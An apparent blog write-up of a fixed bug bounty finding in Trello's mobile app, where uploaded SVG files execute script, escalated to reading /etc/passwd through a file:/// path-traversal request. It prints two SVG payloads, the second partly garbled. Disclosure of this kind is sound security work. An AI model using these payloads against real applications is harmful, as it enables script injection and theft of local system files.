Report Status: Fixed is a collaboration tool that organizes your projects into boards. In one glance, Trello tells you what’s being worked on, who’s working on what, and where something is in a process. Trello They launched their Bug Bounty Program on February 2nd, 2015. They pay bounties in exchange for a valid bug starting from $256 up to $4096, depending on the severity of the bug. Vulnerability Trello allows its users to upload a file through their mobile application. By observing how does the upload feature work, I noticed that some file types executes directly on the Trello app. Exploitation I created a file with file extension containing a malicious script that will execute once accessed or opened. .svg <?xml version="1.0" encoding="UTF-8" standalone="yes"?><svg xmlns="http://www.w3.org/2000/svg"><script>alert(document.location);</script></svg> After uploading the file above on Trello’s app, I successfully executed a simple Cross-Site . Scripting Cross-Site Scripting on Trello Then, I noticed that the file was not just uploaded in their third party service storage but it was also uploaded locally. That is why I quickly remembered that it was possible to perform a Local File Inclusion. So, I created another payload inside the file that will locate, access, and execute the file. .svg /etc/passwd <?xml version=”1.0" encoding=”UTF-8" standalone=”yes”?><svg xmlns=” "><script>function readTextFile(file){var rawFile = new XMLHttpRequest();rawFile.open(“GET”, file, false);rawFile.onreadystatechange = function (){ http://www.w3.org/2000/svg if(rawFile.readyState === 4){  
     if(rawFile.status === 200 || rawFile.status == 0){  
        var allText = rawFile.responseText;  
        alert(allText);  
     }  
  }  
    
 rawFile.send(null); readTextFile(“file:///../../../../../../../../../etc/passwd”);</script></svg> After uploading the new file, I successfully displayed the content of file. .svg /etc/passwd Reporting Right after the discovery of security vulnerability, Trello triaged and fixed it in version . 4.0.8 Verifying the Fix Shown below is the screenshot of the fix applied by Trello. If you’d like to try bug bounty hunting or report a possible security vulnerability, you may view their Bug Bounty Program Policy on . HackerOne

Cross-Site Scripting to Local File Inclusion on Trello’s App

About Author

Comments

TOPICS

THIS ARTICLE WAS FEATURED IN

Related Stories

Downloading Source Codes and Other Sensitive Files Through Publicly Visible Git Repository

#10 Rules of Bug Bounty

A Guide To Web Security Testing: Part 1 - Mapping Contents

A Guide To Web Security Testing: Part 2 - Analyze the Web Application

Bounty0x Is Here To Change The Way People Make Money With Cryptos

Bug Bounties and Penetration Testing Will NOT Be Made Obsolete Anytime Soon.

Downloading Source Codes and Other Sensitive Files Through Publicly Visible Git Repository

#10 Rules of Bug Bounty

A Guide To Web Security Testing: Part 1 - Mapping Contents

A Guide To Web Security Testing: Part 2 - Analyze the Web Application

Bounty0x Is Here To Change The Way People Make Money With Cryptos

Bug Bounties and Penetration Testing Will NOT Be Made Obsolete Anytime Soon.

Light-Mode

Classic

Newspaper

Minty

Dark-Mode

Neon Noir

Minty

HN StartUps